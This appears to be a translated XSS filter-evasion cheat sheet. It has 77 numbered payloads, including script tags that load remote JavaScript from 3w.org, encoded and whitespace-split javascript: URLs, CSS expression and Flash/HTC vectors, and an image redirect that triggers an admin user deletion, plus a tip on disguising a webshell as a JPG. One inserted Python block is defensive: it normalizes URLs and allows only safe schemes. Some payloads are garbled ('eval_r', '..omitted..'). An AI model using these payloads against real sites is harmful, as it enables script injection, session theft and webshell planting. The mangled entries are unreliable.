Cross-site image shell
XSS cross-site code: <script>alert("")</script>

Add the code to the first line of the webshell and change the webshell to JPG image format; when the image-format webshell is accessed, our webshell is executed as well.

(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//

(30) End TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">
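The IMG variants in items 3-14, 17 and 19 and the url() variant in item 47 all rely on the same leniency: the browser decoded entities, ignored control and whitespace characters and compared the scheme case-insensitively before deciding that the value was a javascript: URL. A filter that only looks for the literal string "javascript:" misses every one of them. The following added example (not part of the original post; the function and constant names are my own) normalizes a URL-valued attribute the same way and then accepts only an allowlisted scheme, so all of these variants are rejected by one check.

```python
"""Scheme allowlist for href/src/url() values, normalized like the lenient parsers above."""
import html
import re
import unicodedata

ALLOWED_SCHEMES = {"http", "https"}  # extend deliberately; never javascript, vbscript or data
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.-]*):")
CSS_URL_RE = re.compile(r"url\(\s*['\"]?(.*?)['\"]?\s*\)", re.IGNORECASE | re.DOTALL)


def normalize_url(value: str) -> str:
    """Canonical form used only for the decision; the original value is never rewritten."""
    # Decode HTML entities, with or without trailing semicolons and with zero padding
    # (items 5, 8-10): "&#0000106" and "&#x6A" both become "j".
    decoded = html.unescape(value)
    # Drop every control, format and separator character (Unicode categories C* and Z*):
    # tab, LF, CR, NUL, NBSP, U+2000-U+200F, U+3000, U+FEFF (items 11-14, 17, 19, 47).
    stripped = "".join(ch for ch in decoded if unicodedata.category(ch)[0] not in ("C", "Z"))
    # Fold case so that JaVaScRiPt: compares equal to javascript: (item 4).
    return stripped.lower()


def is_safe_url(value: str) -> bool:
    """True when the value is relative or scheme-relative, or uses an allowlisted scheme."""
    match = SCHEME_RE.match(normalize_url(value))
    if match is None:
        return True  # "/img/x.png" or "//host/x.png": there is no scheme to abuse
    return match.group(1) in ALLOWED_SCHEMES


def css_urls_safe(style: str) -> bool:
    """Same check for every url(...) inside a style attribute or sheet (items 39, 46, 47, 51, 53)."""
    return all(is_safe_url(url) for url in CSS_URL_RE.findall(html.unescape(style)))


if __name__ == "__main__":
    # Constructed samples that follow the payload shapes on this page.
    for sample in ("JaVaScRiPt:alert('XSS')", "jav\tascript:alert('XSS');",
                   " javascript:alert('XSS');", "java\x00script:alert(\"XSS\")",
                   "http://3w.org/XSS/xss.js", "//www.google.com/"):
        print(repr(sample), "->", "allow" if is_safe_url(sample) else "reject")
```

The check only decides on the scheme; the decimal, hex and octal host spellings in items 70-73 are valid http URLs and need a separate host allowlist if that matters for your application.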
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript in Flash, you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add the JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP as decimal
<A HREF="http://3232235521">XSS</A>

(71) IP as hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP as octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/"">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with trailing dot
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>